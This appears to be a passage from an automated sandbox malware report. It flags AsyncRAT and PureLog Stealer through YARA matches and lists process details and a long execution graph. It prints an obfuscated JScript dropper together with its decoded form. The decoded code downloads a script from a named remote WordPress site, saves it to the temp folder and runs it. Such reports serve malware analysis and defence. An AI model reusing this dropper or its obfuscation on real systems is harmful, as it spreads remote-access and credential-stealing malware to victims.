                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:07:00:58
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\audio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\audio.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Code Analysis

                                                Call Graph

                                                • Executed
                                                • Not Executed
                                                callgraph clusterC0 clusterC2C0 clusterC4C0 E1C0 entry:C0 F3C2 fromCharCode E1C0->F3C2 F5C4 eval E1C0->F5C4

                                                Script:

                                                Code
                                                0
                                                var U1s = 258393352;
                                                  1
                                                  var GFDESM = String.fromCharCode ( 258393468 - U1s, 258393466 - U1s, 258393473 - U1s, 258393475 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393429 - U1s, 258393435 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393402 - U1s, 258393398 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393424 - U1s, 258393436 - U1s, 258393436 - U1s, 258393432 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393431 - U1s, 258393464 - U1s, 258393453 - U1s, 258393462 - U1s, 258393392 - U1s, 258393386 - U1s, 258393423 - U1s, 258393421 - U1s, 258393436 - U1s, 258393386 - U1s, 258393396 - U1s, 258393384 - U1s, 258393386 - U1s, 258393456 - U1s, 258393468 - U1s, 258393468 - U1s, 258393464 - U1s, 258393467 - U1s, 258393410 - U1s, 258393399 - U1s, 258393399 - U1s, 258393464 - U1s, 258393463 - U1s, 258393467 - U1s, 258393468 - U1s, 258393469 - U1s, 258393468 - U1s, 258393463 - U1s, 258393464 - U1s, 258393457 - U1s, 258393449 - U1s, 258393398 - U1s, 258393462 - U1s, 258393453 - U1s, 258393468 - U1s, 258393399 - U1s, 258393471 - U1s, 258393464 - U1s, 258393397 - U1s, 258393457 - U1s, 258393462 - U1s, 258393451 - U1s, 258393460 - U1s, 258393469 - U1s, 258393452 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393457 - U1s, 258393461 - U1s, 258393449 - U1s, 258393455 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393467 - U1s, 258393461 - U1s, 258393457 - U1s, 258393460 - U1s, 258393457 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393471 - U1s, 258393464 - U1s, 258393398 - U1s, 258393458 - U1s, 258393467 - U1s, 258393386 - U1s, 258393396 - U1s, 258393384 - U1s, 258393454 - U1s, 258393449 - U1s, 258393460 - U1s, 258393467 - U1s, 258393453 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393453 - U1s, 258393462 - U1s, 258393452 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393454 - U1s, 258393467 - U1s, 258393463 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393435 - U1s, 258393451 - U1s, 258393466 - U1s, 258393457 - U1s, 258393464 - U1s, 258393468 - U1s, 258393457 - U1s, 258393462 - U1s, 258393455 - U1s, 258393398 - U1s, 258393422 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393435 - U1s, 258393473 - U1s, 258393467 - U1s, 258393468 - U1s, 258393453 - U1s, 258393461 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393454 - U1s, 258393467 - U1s, 258393463 - U1s, 258393398 - U1s, 258393423 - U1s, 258393453 - U1s, 258393468 - U1s, 258393435 - U1s, 258393464 - U1s, 258393453 - U1s, 258393451 - U1s, 258393457 - U1s, 258393449 - U1s, 258393460 - U1s, 258393422 - U1s, 258393463 - U1s, 258393460 - U1s, 258393452 - U1s, 258393453 - U1s, 258393466 - U1s, 258393392 - U1s, 258393402 - U1s, 258393393 - U1s, 258393384 - U1s, 258393395 - U1s, 258393384 - U1s, 258393386 - U1s, 258393399 - U1s, 258393425 - U1s, 258393420 - U1s, 258393439 - U1s, 258393441 - U1s, 258393432 - U1s, 258393426 - U1s, 258393398 - U1s, 258393458 - U1s, 258393467 - U1s, 258393386 - U1s, 258393411 - U1s, 258393362 - U1s, 258393457 - U1s, 258393454 - U1s, 258393384 - U1s, 258393392 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393468 - U1s, 258393449 - U1s, 258393468 - U1s, 258393469 - U1s, 258393467 - U1s, 258393384 - U1s, 258393413 - U1s, 258393413 - U1s, 258393384 - U1s, 258393402 - U1s, 258393400 - U1s, 258393400 - U1s, 258393393 - U1s, 258393362 - U1s, 258393475 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393417 - U1s, 258393420 - U1s, 258393431 - U1s, 258393420 - U1s, 258393418 - U1s, 258393398 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393431 - U1s, 258393464 - U1s, 258393453 - U1s, 258393462 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393436 - U1s, 258393473 - U1s, 258393464 - U1s, 258393453 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393401 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393439 - U1s, 258393466 - U1s, 258393457 - U1s, 258393468 - U1s, 258393453 - U1s, 258393392 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393434 - U1s, 258393453 - U1s, 258393467 - U1s, 258393464 - U1s, 258393463 - U1s, 258393462 - U1s, 258393467 - U1s, 258393453 - U1s, 258393418 - U1s, 258393463 - U1s, 258393452 - U1s, 258393473 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393432 - U1s, 258393463 - U1s, 258393467 - U1s, 258393457 - U1s, 258393468 - U1s, 258393457 - U1s, 258393463 - U1s, 258393462 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393400 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393435 - U1s, 258393449 - U1s, 258393470 - U1s, 258393453 - U1s, 258393436 - U1s, 258393463 - U1s, 258393422 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393392 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393396 - U1s, 258393384 - U1s, 258393402 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393419 - U1s, 258393460 - U1s, 258393463 - U1s, 258393467 - U1s, 258393453 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393439 - U1s, 258393467 - U1s, 258393456 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393439 - U1s, 258393435 - U1s, 258393451 - U1s, 258393466 - U1s, 258393457 - U1s, 258393464 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393463 - U1s, 258393434 - U1s, 258393437 - U1s, 258393430 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393439 - U1s, 258393467 - U1s, 258393456 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393398 - U1s, 258393434 - U1s, 258393469 - U1s, 258393462 - U1s, 258393392 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393477 - U1s, 258393362 - U1s, 258393477 - U1s, 258393362 - U1s, 258393451 - U1s, 258393449 - U1s, 258393468 - U1s, 258393451 - U1s, 258393456 - U1s, 258393392 - U1s, 258393453 - U1s, 258393393 - U1s, 258393475 - U1s, 258393477 - U1s, 258393362 - U1s );
                                                    2
                                                    eval ( GFDESM );
                                                    • eval("try{ var Object = new ActiveXObject("MSXML2.XMLHTTP"); Object.Open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", false); Object.Send(); var fso = new ActiveXObject("Scripting.FileSystemObject"); var filepath = fso.GetSpecialFolder(2) + "/IDWYPJ.js"; if (Object.Status == 200) { var Stream = new ActiveXObject("ADODB.Stream"); Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; Stream.SaveToFile(filepath, 2); Stream.Close(); var WshShell = new ActiveXObject("WScript.Shell"); var oRUN = WshShell.Run(filepath); } } catch(e){} ") ➔ undefined
                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:4.8%
                                                      Dynamic/Decrypted Code Coverage:1.2%
                                                      Signature Coverage:5.1%
                                                      Total number of Nodes:1247
                                                      Total number of Limit Nodes:26
                                                      execution_graph 14045 2210890 14046 22108b1 14045->14046 14047 221097a 14046->14047 14050 22132bf 14046->14050 14053 221266f 14046->14053 14056 22192c0 14050->14056 14055 22192c0 VirtualProtect 14053->14055 14054 221268e 14055->14054 14058 22192d3 14056->14058 14060 2219378 14058->14060 14061 22193c0 VirtualProtect 14060->14061 14063 22132d8 14061->14063 14064 2219548 14065 2219588 FindCloseChangeNotification 14064->14065 14067 22195b9 14065->14067 14068 40cbdd 14069 40cbe9 __sopen_helper 14068->14069 14112 40d534 HeapCreate 14069->14112 14072 40cc46 14236 41087e GetModuleHandleW 14072->14236 14075 40cc4c 14076 40cc50 14075->14076 14077 40cc58 __RTC_Initialize 14075->14077 14078 40cbb4 _fast_error_exit 62 API calls 14076->14078 14114 411a15 14077->14114 14079 40cc57 14078->14079 14079->14077 14081 40cc66 14082 40cc72 GetCommandLineA 14081->14082 14083 40cc6a 14081->14083 14129 412892 14082->14129 14269 40e79a 14083->14269 14089 40cc8c 14090 40cc90 14089->14090 14091 40cc98 14089->14091 14092 40e79a __amsg_exit 62 API calls 14090->14092 14154 41255f 14091->14154 14094 40cc97 14092->14094 14094->14091 14096 40cca1 14098 40e79a __amsg_exit 62 API calls 14096->14098 14097 40cca9 14168 40e859 14097->14168 14100 40cca8 14098->14100 14100->14097 14101 40ccb0 14102 40ccb5 14101->14102 14103 40ccbc 14101->14103 14105 40e79a __amsg_exit 62 API calls 14102->14105 14174 4019f0 OleInitialize 14103->14174 14107 40ccbb 14105->14107 14106 40ccd8 14108 40ccea 14106->14108 14287 40ea0a 14106->14287 14107->14103 14290 40ea36 14108->14290 14111 40ccef __sopen_helper 14113 40cc3a 14112->14113 14113->14072 14228 40cbb4 14113->14228 14293 40e1d8 14114->14293 14116 411a21 GetStartupInfoA 14294 411cba 14116->14294 14118 411c60 __sopen_helper 14118->14081 14119 411a42 14119->14118 14121 411cba __calloc_crt 62 API calls 14119->14121 14127 411ba7 14119->14127 14128 411b2a 14119->14128 14120 411bdd GetStdHandle 14120->14127 14121->14119 14122 411c42 SetHandleCount 14122->14118 14123 411bef GetFileType 14123->14127 14124 41389c __getstream InitializeCriticalSectionAndSpinCount 14124->14127 14125 411b53 GetFileType 14125->14128 14127->14118 14127->14120 14127->14122 14127->14123 14127->14124 14128->14118 14128->14125 14128->14127 14299 41389c 14128->14299 14130 4128b0 GetEnvironmentStringsW 14129->14130 14131 4128cf 14129->14131 14132 4128c4 GetLastError 14130->14132 14133 4128b8 14130->14133 14131->14133 14137 412968 14131->14137 14132->14131 14134 4128eb GetEnvironmentStringsW 14133->14134 14135 4128fa WideCharToMultiByte 14133->14135 14134->14135 14139 40cc82 14134->14139 14141 41295d FreeEnvironmentStringsW 14135->14141 14142 41292e 14135->14142 14136 412971 GetEnvironmentStrings 14138 412981 14136->14138 14136->14139 14137->14136 14137->14139 14143 411c75 __malloc_crt 62 API calls 14138->14143 14276 4127d7 14139->14276 14141->14139 14144 411c75 __malloc_crt 62 API calls 14142->14144 14145 41299b 14143->14145 14146 412934 14144->14146 14147 4129a2 FreeEnvironmentStringsA 14145->14147 14148 4129ae _memcpy_s 14145->14148 14146->14141 14149 41293c WideCharToMultiByte 14146->14149 14147->14139 14152 4129b8 FreeEnvironmentStringsA 14148->14152 14150 412956 14149->14150 14151 41294e 14149->14151 14150->14141 14153 40b6b5 __read_nolock 62 API calls 14151->14153 14152->14139 14153->14150 14155 412568 14154->14155 14157 41256d _strlen 14154->14157 14637 41446b 14155->14637 14158 411cba __calloc_crt 62 API calls 14157->14158 14161 40cc9d 14157->14161 14166 4125a2 _strlen 14158->14166 14159 412600 14160 40b6b5 __read_nolock 62 API calls 14159->14160 14160->14161 14161->14096 14161->14097 14162 411cba __calloc_crt 62 API calls 14162->14166 14163 412626 14164 40b6b5 __read_nolock 62 API calls 14163->14164 14164->14161 14165 40ef42 _strcpy_s 62 API calls 14165->14166 14166->14159 14166->14161 14166->14162 14166->14163 14166->14165 14167 40e61c __invoke_watson 10 API calls 14166->14167 14167->14166 14169 40e867 __IsNonwritableInCurrentImage 14168->14169 15042 413586 14169->15042 14171 40e885 __initterm_e 14173 40e8a4 __IsNonwritableInCurrentImage __initterm 14171->14173 15046 40d2bd 14171->15046 14173->14101 14175 401ab9 14174->14175 15146 40b99e 14175->15146 14177 401abf 14178 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 14177->14178 14204 402467 14177->14204 14179 401dc3 FindCloseChangeNotification GetModuleHandleA 14178->14179 14187 401c55 14178->14187 15159 401650 14179->15159 14181 401e8b FindResourceA LoadResource LockResource SizeofResource 14182 40b84d _malloc 62 API calls 14181->14182 14183 401ebf 14182->14183 15161 40af66 14183->15161 14185 401c9c CloseHandle 14185->14106 14186 401ecb _memset 14188 401efc SizeofResource 14186->14188 14187->14185 14190 401cf9 Module32Next 14187->14190 14189 401f5f 14188->14189 14194 401f1c 14188->14194 14191 401f92 _memset 14189->14191 14193 401560 __VEC_memcpy 14189->14193 14190->14179 14200 401d0f 14190->14200 14195 401fa2 FreeResource 14191->14195 14193->14191 14194->14189 15199 401560 14194->15199 14196 40b84d _malloc 62 API calls 14195->14196 14197 401fbb SizeofResource 14196->14197 14198 401fe5 _memset 14197->14198 14199 4020aa LoadLibraryA 14198->14199 14201 401650 14199->14201 14200->14185 14203 401dad Module32Next 14200->14203 14202 40216c GetProcAddress 14201->14202 14202->14204 14205 4021aa 14202->14205 14203->14179 14203->14200 14204->14106 14205->14204 15173 4018f0 14205->15173 14207 40243f 14207->14204 14208 40b6b5 __read_nolock 62 API calls 14207->14208 14208->14204 14209 4021f1 14209->14207 15185 401870 14209->15185 14211 402269 VariantInit 14212 401870 75 API calls 14211->14212 14213 40228b VariantInit 14212->14213 14214 4022a7 14213->14214 14215 4022d9 SafeArrayCreate SafeArrayAccessData 14214->14215 15190 40b350 14215->15190 14218 40232c 14219 402354 SafeArrayDestroy 14218->14219 14227 40235b 14218->14227 14219->14227 14220 402392 SafeArrayCreateVector 14221 4023a4 14220->14221 14222 4023bc VariantClear VariantClear 14221->14222 15192 4019a0 14222->15192 14225 40242e 14226 4019a0 65 API calls 14225->14226 14226->14207 14227->14220 14229 40cbc2 14228->14229 14230 40cbc7 14228->14230 14231 40ec4d __FF_MSGBANNER 62 API calls 14229->14231 14232 40eaa2 __NMSG_WRITE 62 API calls 14230->14232 14231->14230 14233 40cbcf 14232->14233 14234 40e7ee _doexit 3 API calls 14233->14234 14235 40cbd9 14234->14235 14235->14072 14237 410892 14236->14237 14238 410898 14236->14238 14239 40e76a __crt_waiting_on_module_handle 2 API calls 14237->14239 14240 410a01 14238->14240 14241 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14238->14241 14239->14238 15467 410598 14240->15467 14242 4108ec TlsAlloc 14241->14242 14245 410a06 14242->14245 14246 41093a TlsSetValue 14242->14246 14245->14075 14246->14245 14247 41094b 14246->14247 15456 40ea54 14247->15456 14250 41046e __encode_pointer 6 API calls 14251 41095b 14250->14251 14252 41046e __encode_pointer 6 API calls 14251->14252 14253 41096b 14252->14253 14254 41046e __encode_pointer 6 API calls 14253->14254 14255 41097b 14254->14255 14256 41046e __encode_pointer 6 API calls 14255->14256 14257 41098b 14256->14257 15463 40d564 14257->15463 14260 4104e9 __decode_pointer 6 API calls 14261 4109ac 14260->14261 14261->14240 14262 411cba __calloc_crt 62 API calls 14261->14262 14263 4109c5 14262->14263 14263->14240 14264 4104e9 __decode_pointer 6 API calls 14263->14264 14265 4109df 14264->14265 14265->14240 14266 4109e6 14265->14266 14267 4105d5 __initptd 62 API calls 14266->14267 14268 4109ee GetCurrentThreadId 14267->14268 14268->14245 14270 40ec4d __FF_MSGBANNER 62 API calls 14269->14270 14271 40e7a4 14270->14271 14272 40eaa2 __NMSG_WRITE 62 API calls 14271->14272 14273 40e7ac 14272->14273 14274 4104e9 __decode_pointer 6 API calls 14273->14274 14275 40cc71 14274->14275 14275->14082 14277 4127f1 GetModuleFileNameA 14276->14277 14278 4127ec 14276->14278 14280 412818 14277->14280 14279 41446b ___initmbctable 106 API calls 14278->14279 14279->14277 15476 41263d 14280->15476 14283 412874 14283->14089 14284 411c75 __malloc_crt 62 API calls 14285 41285a 14284->14285 14285->14283 14286 41263d _parse_cmdline 72 API calls 14285->14286 14286->14283 15488 40e8de 14287->15488 14289 40ea1b 14289->14108 14291 40e8de _doexit 62 API calls 14290->14291 14292 40ea41 14291->14292 14292->14111 14293->14116 14297 411cc3 14294->14297 14296 411d00 14296->14119 14297->14296 14298 411ce1 Sleep 14297->14298 14303 40e231 14297->14303 14298->14297 14636 40e1d8 14299->14636 14301 4138a8 InitializeCriticalSectionAndSpinCount 14302 4138ec __sopen_helper 14301->14302 14302->14128 14304 40e23d __sopen_helper 14303->14304 14305 40e255 14304->14305 14314 40e274 _memset 14304->14314 14316 40bfc1 14305->14316 14309 40e2e6 HeapAlloc 14309->14314 14312 40e26a __sopen_helper 14312->14297 14314->14309 14314->14312 14322 40d6e0 14314->14322 14329 40def2 14314->14329 14335 40e32d 14314->14335 14338 40d2e3 14314->14338 14341 4106bc GetLastError 14316->14341 14318 40bfc6 14319 40e744 14318->14319 14320 4104e9 __decode_pointer 6 API calls 14319->14320 14321 40e754 __invoke_watson 14320->14321 14323 40d6f5 14322->14323 14324 40d708 EnterCriticalSection 14322->14324 14419 40d61d 14323->14419 14324->14314 14326 40d6fb 14326->14324 14327 40e79a __amsg_exit 61 API calls 14326->14327 14328 40d707 14327->14328 14328->14324 14332 40df20 14329->14332 14330 40dfb9 14334 40dfc2 14330->14334 14631 40db09 14330->14631 14332->14330 14332->14334 14624 40da59 14332->14624 14334->14314 14635 40d606 LeaveCriticalSection 14335->14635 14337 40e334 14337->14314 14339 4104e9 __decode_pointer 6 API calls 14338->14339 14340 40d2f3 14339->14340 14340->14314 14355 410564 TlsGetValue 14341->14355 14344 410729 SetLastError 14344->14318 14345 411cba __calloc_crt 59 API calls 14346 4106e7 14345->14346 14346->14344 14360 4104e9 TlsGetValue 14346->14360 14349 410720 14388 40b6b5 14349->14388 14350 410708 14370 4105d5 14350->14370 14353 410710 GetCurrentThreadId 14353->14344 14354 410726 14354->14344 14356 410594 14355->14356 14357 410579 14355->14357 14356->14344 14356->14345 14358 4104e9 __decode_pointer 6 API calls 14357->14358 14359 410584 TlsSetValue 14358->14359 14359->14356 14361 410501 14360->14361 14362 410522 GetModuleHandleW 14360->14362 14361->14362 14365 41050b TlsGetValue 14361->14365 14363 410532 14362->14363 14364 41053d GetProcAddress 14362->14364 14394 40e76a 14363->14394 14368 41051a 14364->14368 14369 410516 14365->14369 14368->14349 14368->14350 14369->14362 14369->14368 14398 40e1d8 14370->14398 14372 4105e1 GetModuleHandleW 14373 4105f1 14372->14373 14374 4105f7 14372->14374 14375 40e76a __crt_waiting_on_module_handle 2 API calls 14373->14375 14376 410633 14374->14376 14377 41060f GetProcAddress GetProcAddress 14374->14377 14375->14374 14378 40d6e0 __lock 58 API calls 14376->14378 14377->14376 14379 410652 InterlockedIncrement 14378->14379 14399 4106aa 14379->14399 14382 40d6e0 __lock 58 API calls 14383 410673 14382->14383 14402 4145d2 InterlockedIncrement 14383->14402 14385 410691 14414 4106b3 14385->14414 14387 41069e __sopen_helper 14387->14353 14389 40b6c1 __sopen_helper 14388->14389 14390 40b73d __sopen_helper 14389->14390 14391 40b714 HeapFree 14389->14391 14390->14354 14391->14390 14392 40b727 14391->14392 14393 40bfc1 __sopen_helper 61 API calls 14392->14393 14393->14390 14395 40e775 Sleep GetModuleHandleW 14394->14395 14396 40e793 14395->14396 14397 40e797 14395->14397 14396->14395 14396->14397 14397->14364 14397->14368 14398->14372 14417 40d606 LeaveCriticalSection 14399->14417 14401 41066c 